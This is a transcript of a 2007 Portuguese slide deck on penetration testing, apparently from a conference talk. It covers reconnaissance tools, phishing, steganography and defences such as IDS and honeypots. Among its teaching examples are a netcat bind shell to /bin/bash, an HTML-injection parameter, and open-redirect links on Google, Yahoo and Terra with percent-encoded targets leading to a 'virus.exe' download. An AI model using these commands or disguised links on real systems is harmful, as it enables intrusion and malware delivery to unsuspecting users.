pentest conisli07
TRANSCRIPT
![Page 2: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/2.jpg)
Cleber Brandã[email protected]
![Page 3: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/3.jpg)
About me
Utilizo linux há 7 anos Aulas de linux Faculdades Radial Formado Gerenciamento de Redes Suporte e aulas Projeto Telecentros SP Participante do ISSA-Brasil Testes de performance e segurança
BRconnection®
![Page 4: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/4.jpg)
Tópicos
Técnicas de Invasão
Definindo um alvo
Recolhendo informações
Ferramentas úteis
Phishing
Esteganografia
Técnicas contra Invasão
Firewall + IDS
HIDS
HoneyPots
Antispam
![Page 5: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/5.jpg)
Técnicas de invasão
Engenharia social Brute Force Espionagem Segurança por obscuridade
![Page 6: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/6.jpg)
Definindo um alvo
Onde buscar informações?
myspace
orkut
google groups
![Page 7: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/7.jpg)
Buscas específicas
Utilizando recursos avançados do google como as tags Intitle, Inurl, Intext
Podem te trazer resultados muito interessantes.
![Page 8: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/8.jpg)
![Page 9: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/9.jpg)
![Page 10: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/10.jpg)
![Page 11: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/11.jpg)
![Page 12: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/12.jpg)
Engenharia social
![Page 13: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/13.jpg)
Adão e Eva Primeiras vitimas de engenharia social
![Page 14: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/14.jpg)
Apenas 2 coisas no mundo são infinitas, o universo e a estupidez humana.
(Albert Einstein)
![Page 15: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/15.jpg)
Ferramentas úteis
google dig nmap nessus Metasploit telnet
sendip john the ripper host hping3 netcat
![Page 16: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/16.jpg)
dig
Uma ferramenta similar ou nslookup porém mais flexível, pode ser utilizada para fazer buscas como A,TXT, MX e NS.
![Page 17: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/17.jpg)
dig +qr google.com any;; ANSWER SECTION:google.com. 10186 IN MX 10 smtp2.google.com.google.com. 10186 IN MX 10 smtp3.google.com.google.com. 10186 IN MX 10 smtp4.google.com.google.com. 10186 IN MX 10 smtp1.google.com.google.com. 318637 IN NS ns1.google.com.google.com. 318637 IN NS ns2.google.com.google.com. 318637 IN NS ns3.google.com.google.com. 318637 IN NS ns4.google.com.
;; AUTHORITY SECTION:google.com. 318637 IN NS ns2.google.com.google.com. 318637 IN NS ns3.google.com.google.com. 318637 IN NS ns4.google.com.google.com. 318637 IN NS ns1.google.com.
;; ADDITIONAL SECTION:smtp1.google.com. 2986 IN A 72.14.203.25smtp2.google.com. 2986 IN A 64.233.167.25smtp3.google.com. 2986 IN A 64.233.183.25smtp4.google.com. 2986 IN A 72.14.215.25ns1.google.com. 345220 IN A 216.239.32.10ns2.google.com. 345220 IN A 216.239.34.10ns3.google.com. 345219 IN A 216.239.36.10ns4.google.com. 345219 IN A 216.239.38.10
![Page 18: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/18.jpg)
PortScan
![Page 19: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/19.jpg)
Nmap
é o mais famoso portscan existente hoje. (www.insecure.org/nmap). É uma ótima ferramenta, muito utilizado por hackers, para descobrir falhas no sistema, em portas abertas desnecessariamente.
![Page 20: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/20.jpg)
Nessus
O Nessus é uma ferramenta de auditoria muito usada para detectar e corrigir vulnerabilidades nos PCs da rede local porem é muito utilizado por hackers para descobrir a vulnerabilidade de um alvo.
![Page 21: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/21.jpg)
Reports
Nessus Scan Report
SUMMARY
- Number of hosts which were alive during the test : 1
- Number of security holes found : 1
- Number of security warnings found : 1
- Number of security notes found : 15
![Page 22: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/22.jpg)
Reports
DETAILS
. List of open ports :
o smtp (25/tcp) (Security notes found)
o ssh (22/tcp) (Security notes found)
o ftp (21/tcp) (Security notes found)
![Page 23: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/23.jpg)
Reports
Information found on port smtp (25/tcp)
An SMTP server is running on this port
Here is its banner :
220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov
2007 09:35:31 -0300; (No UCE/UBE) logging access from:
localhost(OK)-localhost [127.0.0.1]
. Information found on port smtp (25/tcp)
Remote SMTP server banner :
220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov
2007 09:35:57 -0300; (No UCE/UBE) logging access from:
localhost(OK)-localhost [127.0.0.1]
This is probably: Sendmail version 8.14.1
![Page 24: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/24.jpg)
Reports
. Information found on port ssh (22/tcp)
An ssh server is running on this port
. Information found on port ssh (22/tcp)
Remote SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1
Remote SSH supported authentication : publickey,password
Remote SSH banner :
CleBeer's |_b note.
![Page 25: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/25.jpg)
Reports
![Page 26: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/26.jpg)
Metasploit
é um ambiente utilizado para escrever, testar, e
executa códigos de exploit. Foi desenvolvido para prover penetração
e testes em computadores relacionados a esse assunto, como também pesquisa de vulnerabilidade.
![Page 27: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/27.jpg)
Metasploit
Linha de comando
Interface web
![Page 28: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/28.jpg)
http://127.0.0.1:55555/
![Page 29: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/29.jpg)
http://127.0.0.1:55555/
![Page 30: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/30.jpg)
msfconsole
![Page 31: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/31.jpg)
telnet www.alvo.com.br 80
Trying 200.189.171.181...
Connected to www.alvo.com.br.
Escape character is '^]'.
GET / HTTP/1.1
Host: www.alvo.com.br
![Page 32: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/32.jpg)
Resultado
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Location: http://www.alvo.com.br/index.htm
Date: Thu, 01 Nov 2007 13:26:39 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
![Page 33: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/33.jpg)
John the ripper
Um programa usado para decifrar senhas suportado nas plataformas UNIX, DOS, WinNT?/Win95. É um programa disponível gratuitamente desenvolvido para decifrar senhas MD5, DES baseado na função CRYPT.
![Page 34: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/34.jpg)
Usar senhas fortes?
![Page 35: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/35.jpg)
![Page 36: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/36.jpg)
Nem sempre é a solução
![Page 37: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/37.jpg)
hping3
Mais uma ferramenta capaz de enviar pacotes TCP, UDP e ICMP personalizados e receber respostas como consegue em icmp. Com ele você pode enviar arquivos encapsulados e é util para ataques DoS.
![Page 38: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/38.jpg)
netcat
Programa para consultoria de redes muito conhecido, isso deve-se ao fato de ele ser um programa muito versátil, podendo desde ser um simples telnet, portscan até um sniffer.
![Page 39: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/39.jpg)
Trojan
nc -l -e /bin/bash -p 1033
A porta 1033 será colocada em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador.
![Page 40: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/40.jpg)
Sniffer
# nc -vv -z 75.126.176.71 -p 80 22 110 25 21
servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused
servidor9.molservidores.com [75.126.176.71] 110 (pop3) open
servidor9.molservidores.com [75.126.176.71] 25 (smtp) open
servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
![Page 41: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/41.jpg)
Phishing
![Page 42: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/42.jpg)
O que é phishing?
Phishing é um tipo de fraude projetada para roubar sua identidade. Em um phishing scam, uma pessoa mal-intencionada tenta obter informações como números de cartões de crédito, senhas, dados de contas ou outras informações pessoais convencendo você a fornecê-las sob pretextos enganosos.
![Page 43: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/43.jpg)
Exemplos
Alguns sites famosos que permitem este tipo de fake:
yahoo
terra
![Page 44: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/44.jpg)
http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-fXBJGSiQLU0eDSAueHkArnhtWZAu-FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&adurl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65
![Page 45: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/45.jpg)
Yahoo
http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=129lovkbd/EXP=1188434124/**%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65
![Page 46: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/46.jpg)
Buscador terra
http://buscador.terra.com.br/Redirector.aspx?bstat=terrastats01&type=CK&source=buscador.terra.com.br&id=sponsored&partner=google&query=nike&position=1&target=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65
![Page 47: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/47.jpg)
Destino???
Nas 3 URLs anteriores a requisição seria encaminhada para:
clebeer.no-ip.org/virus.exe
![Page 49: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/49.jpg)
![Page 50: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/50.jpg)
Adicionando...
&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
![Page 51: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/51.jpg)
![Page 52: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/52.jpg)
Esteganografia
Esteganografia basicamente é uma técnica de esconder um arquivo dentro de outro arquivo, podendo ser uma imagem , ou documento do Word até mesmo uma planilha de excel e etc só que de uma forma criptografada.
![Page 53: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/53.jpg)
jp(hide an seek)
O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.
![Page 54: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/54.jpg)
origem.jpg
![Page 55: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/55.jpg)
destino.jpg
![Page 56: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/56.jpg)
msg.txt
Ola esta mensagem e secreta
e somente pessoas que possuam a senha podem vê-la
senha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)2231
![Page 57: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/57.jpg)
Utilização
Esconder mensagem:
jphide origem.jpg destino.jpg mensagem.txt
Descobir mensagem:
jpseek destino.jpg texto-secreto.txt
![Page 58: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/58.jpg)
Quanto vale?
Trojan (Shell) - US$ 350,00 - US$700,00 Trojan (Roubo de Senhas) - US$600,00 Listagem E-mail (32 milhões) - US$1.500,00 Milhões de Usuários do ICQ - US$150,00 Proteção Contra Detecção do Trojan - US$20,00 Suporte
![Page 59: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/59.jpg)
Tecnicas contra invasão
Firewall (NHWK)IDS HoneyPots Antispam
![Page 60: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/60.jpg)
Firewall
Port Knock, uma solução leve e fácil de configurar, permite que portas específicas só sejam abertas no momento desejado atraves de tentativas de conexão em portas específicas.
![Page 61: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/61.jpg)
*IDS
NIDS – Network Intrusion Detection System HIDS - Host-based Intrusion Detection System WIDS – Wireless Intrusion Detection System KIDS - Kernel Intrusion Detection System
![Page 62: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/62.jpg)
Honeypot
Útil para vigilância e alerta aos tipos de ataques mais utilizados porem deve ser utilizado com cuidado para que o invasor não tenha acesso a rede real.
![Page 63: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/63.jpg)
Antispam
Indispensável para qualquer MX, útil para evitar emails forjados e de domínios não confiaveis, pode ser incrementado com opções de RBL e CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart").
![Page 64: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/64.jpg)
Conclusão
Com a popularidade do SL a informação ficou mais acessível o que colaborou para um maior avanço das técnicas de invasão, em contra partida os sistemas de segurança vem se tornando mais estáveis a casa dia.
![Page 65: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/65.jpg)
Créditos
www.google.com www.brc.com.br naopod.com.br spookerlabs.multiply.com http://cartilha.cert.br/malware/
![Page 66: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/66.jpg)
Perguntas
![Page 67: Pentest conisli07](https://reader034.vdocuments.mx/reader034/viewer/2022042506/55757860d8b42adb7e8b49d1/html5/thumbnails/67.jpg)
OBRIGADO!